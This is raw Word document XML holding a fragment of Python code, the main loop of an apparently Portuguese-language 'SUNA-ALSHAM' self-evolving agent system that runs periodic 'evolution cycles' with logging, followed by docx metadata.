          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>❌</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Ciclo falhou: {result.get('message', 'Unknown error')}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744EAC8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return False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093C9B1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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7517A80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except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27964ED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logger.error(f"</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>❌</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Erro durante ciclo de evolu</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>çã</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>o: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5A70F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return False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AD2AD8" w14:textId="77777777" w:rsidR="000F7565" w:rsidRPr="000F7565" w:rsidRDefault="000F7565" w:rsidP="000F7565">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42517C4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def main():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B18B702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"""Função principal do sistema."""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E31A91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logger.info("</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🚀</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> SUNA-ALSHAM Sistema Auto-Evolutivo Iniciando...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222F7C6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logger.info("=" * 60)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C4D1C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23B0FFB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# Configurar ambiente</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584EADF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if not setup_environment():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7526E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logger.error("</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>❌</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Falha na configura</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>çã</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>o do ambiente")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7261AED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sys.exit(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287DB99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7A467C6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# Inicializar Core Agent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1F300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core_agent = initialize_core_agent()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3081F71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if not core_agent:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F063D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logger.error("</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>❌</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Falha na inicializa</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>çã</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>o do Core Agent")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153374C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sys.exit(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7213637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6CDC758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# Configurações do sistema</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60964C1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auto_start = os.getenv('SUNA_ALSHAM_AUTO_START', 'true').lower() == 'true'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F2965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evolution_interval = int(os.getenv('SUNA_ALSHAM_EVOLUTION_INTERVAL', '60'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757DEB48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7AB81008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logger.info(f"</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>⚙️</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Auto-start: {auto_start}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024BF76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logger.info(f"</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>⏱️</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Intervalo de evolução: {evolution_interval} minutos")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375FAF18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6CCD02C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if auto_start:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF0CC6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logger.info("</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔄</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Modo automático ativado - Executando ciclos de evolução...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DEA77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2FCC745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cycle_count = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51976F0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while True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398BB92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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404A39C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cycle_count += 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A97346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logger.info(f"</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔄</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Ciclo #{cycle_count} - {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C2143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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518EF9EB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# Executar ciclo de evolução</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7516881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success = run_evolution_cycle(core_agent)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6F740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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC4229D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if success:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3170BFA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    logger.info(f"</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Ciclo #{cycle_count} conclu</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>í</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>do com sucesso")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D75ECC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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40091FC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    logger.warning(f"</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>⚠️</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Ciclo #{cycle_count} teve problemas")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3913EEF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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC2D73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# Aguardar próximo ciclo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C63064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logger.info(f"</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>⏳</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Aguardando {evolution_interval} minutos para pr</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ó</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ximo ciclo...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733B520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time.sleep(evolution_interval * 60)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C5DCD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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B6BE5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except KeyboardInterrupt:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B1B27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logger.info("</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🛑</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Sistema interrompido pelo usuário")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0718D11C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break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1ACA08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except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C56AD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logger.error(f"</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>❌</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Erro inesperado: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A0EDC8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logger.info("</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔄</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Tentando novamente em 5 minutos...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCF0187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    time.sleep(300)  # 5 minutos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7A52C9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7BC6D27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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158428C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logger.info("</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔄</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Modo manual - Executando um ciclo único...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1CE0D1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success = run_evolution_cycle(core_agent)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E95DD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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C19F26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if success:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16036ECA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logger.info("</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Ciclo </w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ú</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nico conclu</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>í</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>do com sucesso")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBE0A23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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4197908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        logger.error("</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>❌</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Ciclo </w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ú</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nico falhou")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9013CF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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2854CFB5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logger.info("</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🏁</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> SUNA-ALSHAM Sistema finalizado")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B10E9F" w14:textId="77777777" w:rsidR="000F7565" w:rsidRPr="000F7565" w:rsidRDefault="000F7565" w:rsidP="000F7565">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B8AC8A0" w14:textId="77777777" w:rsidR="000F7565" w:rsidRPr="000F7565" w:rsidRDefault="000F7565" w:rsidP="000F7565">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E38A1A" w14:textId="5DA95325" w:rsidR="000F7565" w:rsidRDefault="000F7565" w:rsidP="000F7565">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">    main()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E03D910" w14:textId="409533CF" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36F153C2" wp14:editId="6A0C1F67">
            <wp:extent cx="7259063" cy="6620799"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="104686411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6411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59063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2FF" w:rsidRPr="006D02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2FF"/>
    <w:rsid w:val="000F7565"/>
    <w:rsid w:val="00631A62"/>
    <w:rsid w:val="006D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72E2D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{AA29CAF9-0146-4CFE-BAE2-1EA0612A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0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0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0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0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0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0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02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2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2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2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2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2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2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2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2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2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4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2081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6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4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29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D1D9E0"/>
                                                <w:bottom w:val="single" w:sz="6" w:space="0" w:color="D1D9E0"/>
                                                <w:right w:val="single" w:sz="6" w:space="0" w:color="D1D9E0"/>
                                              </w:divBdr>
                                              <w:divsChild>
                                                <w:div w:id="97271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97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719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5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949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1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53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5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5402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83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0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D1D9E0"/>
                                                <w:bottom w:val="single" w:sz="6" w:space="0" w:color="D1D9E0"/>
                                                <w:right w:val="single" w:sz="6" w:space="0" w:color="D1D9E0"/>
                                              </w:divBdr>
                                              <w:divsChild>
                                                <w:div w:id="195314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4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914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5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8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7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0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5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3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8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7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1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8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83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7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2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4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4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0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2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13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7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62633</Words>
  <Characters>338224</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>2818</Lines>
  <Paragraphs>800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2025-07-23T20:38:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-07-23T20:52:00Z</dcterms:modified>
</cp:coreProperties>
</file>